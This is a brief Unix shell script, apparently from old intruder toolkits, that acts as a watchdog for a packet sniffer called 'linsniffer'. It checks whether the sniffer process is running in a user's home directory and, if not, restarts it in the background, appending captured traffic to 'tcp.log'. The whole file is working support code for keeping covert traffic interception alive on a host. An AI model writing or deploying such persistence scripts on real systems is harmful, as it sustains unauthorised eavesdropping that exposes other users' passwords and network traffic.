#!/bin/sh

# checks if your sniffer is running..

# directory your sniffer is in
dname="/home/j/joseph"

# name of your sniffer
sname="linsniffer"

# file that your normally save your sniff-logs to
lname="tcp.log"

if 
pidof -s $sname >/dev/null
then
echo "Sniffer running."
else
echo "Restarting sniffer..."
${dname}/${sname} >> $lname &
echo "done."
exit
fi